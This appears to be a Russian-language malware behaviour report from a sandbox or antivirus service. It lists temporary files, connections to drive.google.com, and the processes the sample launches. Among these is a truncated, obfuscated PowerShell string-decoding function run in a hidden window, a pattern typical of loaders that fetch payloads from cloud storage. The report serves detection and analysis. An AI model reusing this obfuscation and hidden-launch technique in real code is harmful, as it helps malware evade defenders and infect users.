Техническая информация
Изменения в файловой системе
Создает следующие файлы
- %WINDIR%\temp\cab148a.tmp
- %WINDIR%\temp\tar148b.tmp
- %WINDIR%\temp\cab2aab.tmp
- %WINDIR%\temp\tar2aac.tmp
Удаляет следующие файлы
- %WINDIR%\temp\cab148a.tmp
- %WINDIR%\temp\tar148b.tmp
- %WINDIR%\temp\cab2aab.tmp
- %WINDIR%\temp\tar2aac.tmp
Сетевая активность
Подключается к
- 'drive.google.com':443
- 'pk#.goog':80
TCP
Запросы HTTP GET
- http://pk#.goog/gsr1/gsr1.crt
Другие
- 'drive.google.com':443
UDP
- DNS ASK drive.google.com
- DNS ASK pk#.goog
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "Function Brush9 ([String]$Sevenf){For($Geneal=5; $Geneal -lt $Sevenf.Length-$Autotr; $Geneal+=6){$Tllerkor=$Sevenf.Substring($Geneal, $Autotr);$Daisy=$Daisy+$Tllerkor}$Daisy;}$Merin = 'echo 1 ...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "Function Brush9 ([String]$Sevenf){For($Geneal=5; $Geneal -lt $Sevenf.Length-$Autotr; $Geneal+=6){$Tllerkor=$Sevenf.Substring($Geneal, $Autotr);$Daisy=$Daisy+$Tllerkor}$Daisy;}$Merin = 'echo 1 ...
- '<SYSTEM32>\cmd.exe' /c "echo 1 && exit"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "Function Brush9 ([String]$Sevenf){For($Geneal=5; $Geneal -lt $Sevenf.Length-$Autotr; $Geneal+=6){$Tllerkor=$Sevenf.Substring($Geneal, $Autotr);$Daisy=$Daisy+$Tllerkor}$Daisy;}$Merin = 'echo 1 ...
- '%WINDIR%\syswow64\cmd.exe' /c "echo 1 && exit"
